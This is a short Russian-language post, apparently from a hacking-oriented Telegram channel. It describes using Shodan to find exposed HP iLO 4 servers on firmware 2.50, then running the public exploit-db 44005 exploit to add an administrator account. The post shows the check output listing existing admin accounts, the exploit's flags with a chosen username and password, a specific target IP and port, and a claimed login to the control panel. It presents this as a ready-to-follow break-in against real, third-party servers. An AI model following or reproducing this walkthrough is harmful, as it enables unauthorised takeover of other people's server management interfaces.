Shodan. HP iLO RCE.
Social EngineeringСуществует старая уязвимость 2018 года, связанная с системой управления серверами HP.
В Сети в открытом доступе опубликован эксплоит для серьезной уязвимости в серверах Hewlett Packard Integrated Lights-Out 4 (HP iLO 4)
Был взят эксплойт с ресурса https://www.exploit-db.com/exploits/44005 HPE iLO 4 < 2.53 – Add New Administrator User
Сделав запрос в шодане получаем сервера с iLO v2.5
Код:
iLO-Firmware: 2.50
iLO-Firmware: 2.50
Код:
При проверке с ключом -t . видим список администраторов [+] Target is VULNERABLE! [+] Account name: User Account Username: Administrator [+] Account name: User Account Username: Black запускаем эксплойт с ключами -e -u shodan -p shodan@1234Shodan 173.13.58.217:8889
авторизация
панель управления
так же хочется добавить аналог шодана FOFA
Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)
S.E.Book - Литература социального инженера.
@Social_Engineering_bot - Бот обратной связи.